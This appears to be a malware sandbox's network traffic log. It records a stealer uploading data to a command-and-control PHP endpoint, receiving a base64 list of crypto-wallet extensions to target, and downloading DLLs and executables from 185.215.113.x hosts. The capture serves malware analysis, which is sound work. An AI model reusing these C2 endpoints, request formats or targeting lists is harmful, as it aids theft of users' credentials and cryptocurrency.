Nov 5, 2024 18:46:33.317876101 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 5, 2024 18:46:33.317924976 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 5, 2024 18:46:33.317934990 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 5, 2024 18:46:33.317972898 CET	336	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 5, 2024 18:46:33.317984104 CET	1236	IN	Data Raw: 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d Data Ascii: ZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB
Nov 5, 2024 18:46:33.317990065 CET	1236	IN	Data Raw: 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 Data Ascii: MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHx
Nov 5, 2024 18:46:33.318001986 CET	828	IN	Data Raw: 59 57 39 6d 63 47 68 69 61 6d 64 6a 61 47 68 38 4d 58 77 77 66 44 42 38 56 6d 56 75 62 32 30 67 56 32 46 73 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d Data Ascii: YW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3w
Nov 5, 2024 18:46:33.318023920 CET	828	IN	Data Raw: 59 57 39 6d 63 47 68 69 61 6d 64 6a 61 47 68 38 4d 58 77 77 66 44 42 38 56 6d 56 75 62 32 30 67 56 32 46 73 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d Data Ascii: YW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3w
Nov 5, 2024 18:46:33.326010942 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="message"fplugins------GDHIEHJEBAAFIDHJEBGI--
Nov 5, 2024 18:46:33.614067078 CET	335	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 5, 2024 18:46:33.726129055 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFC Host: 185.215.113.206 Content-Length: 6275 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 18:46:33.726162910 CET	6275	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 5, 2024 18:46:34.528322935 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:46:34.932061911 CET	94	OUT	GET /746f34465cf17784/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:35.219530106 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 5, 2024 18:46:35.219552994 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49917	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:33.673248053 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004156001&unit=246122658369
Nov 5, 2024 18:46:34.592019081 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49920	185.215.113.16	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:34.701908112 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 18:46:35.632921934 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:35 GMT Content-Type: application/octet-stream Content-Length: 2778112 Last-Modified: Tue, 05 Nov 2024 16:52:43 GMT Connection: keep-alive ETag: "672a4d5b-2a6400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 ff 7f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +`Ui` @ @.rsrc`2@.idata 8@lnurvrsx :@bknhvqdr >@.taggant@"B*@
Nov 5, 2024 18:46:35.633003950 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633137941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633183002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633193970 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633208036 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633240938 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633251905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:35.633265018 CET	672	IN	Data Raw: 1c ad 85 dd ea d1 91 ea f5 9e 7b c1 a3 85 50 77 4c 9c f1 52 59 90 89 b3 b5 73 98 d6 fe 21 74 a7 7d 6d ab e4 0b 9d ac 01 37 bc 8e 1d 56 b3 94 6f 60 71 5a d4 0f 06 1c ec 1a f2 2c 80 ff 75 b4 e5 13 7f 96 49 27 ba b7 e7 f9 7a bb 96 9a 13 78 1b b7 98 Data Ascii: {PwLRYs!t}m7Vo`qZ,uI'zx9q wB1z+4d>@Vz:K=)t<AI:s\|]Bu+48T68cGthsg<~gY#SDo6'e
Nov 5, 2024 18:46:35.633301973 CET	1236	IN	Data Raw: 81 91 d5 6c 4a 88 aa a9 34 9a c2 dd 45 08 8b d5 9b 7c 7e e3 8b b2 75 01 ae 82 c6 7d fe 4e fe c3 85 1c 80 e7 fe 8d 78 6d 02 da 78 f8 cb 00 5b 9c d9 7a 94 b5 14 c0 92 3b 1a 83 f8 ef 98 c9 ea fb 49 cd 80 09 c6 f9 f2 5e c2 90 41 a7 1d 64 81 77 09 75 Data Ascii: lJ4E\|~u}Nxmx[z;I^Adwufxzu=wU9~?Hiz7}Nu^*u wx{wClWGlYwj{\-t\|d\|6Gz\|[{4Dc(
Nov 5, 2024 18:46:35.638070107 CET	1236	IN	Data Raw: 19 95 e8 7b b4 d1 92 61 c2 a4 7d 6a 1f c6 71 4d 55 11 b3 29 c0 24 f3 5e 00 9b bd fa 06 b9 7c 3e 7b 93 85 40 0c a6 84 ea 57 5c 90 1a 3f d1 eb 03 59 62 86 2e 66 1f aa 81 fd f1 99 43 67 d5 65 c7 f2 dd e5 3a 61 eb e4 0f 5b d2 ea b4 f8 33 e3 3b 69 c4 Data Ascii: {a}jqMU)$^\|>{@W\?Yb.fCge:a[3;i-;?dYEfCeI`?p7j}=;[He_P:iw?VyWY2$PSVg&rm7}f;(=+;?4Y5ka\|A,\nZ0B5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49950	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:39.897842884 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004157001&unit=246122658369
Nov 5, 2024 18:46:40.817370892 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49959	185.215.113.16	80	7788	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:41.291950941 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 5, 2024 18:46:42.204267025 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:42 GMT Content-Type: application/octet-stream Content-Length: 2095616 Last-Modified: Tue, 05 Nov 2024 16:58:03 GMT Connection: keep-alive ETag: "672a4e9b-1ffa00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 50 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 71 00 00 04 00 00 8a bc 20 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,Pq@q @P.d. p.v@.rsrc .@.idata .@ P).@kwdkpzgxPWJ@juauvnci@q@.taggant0Pq"@
Nov 5, 2024 18:46:42.204279900 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
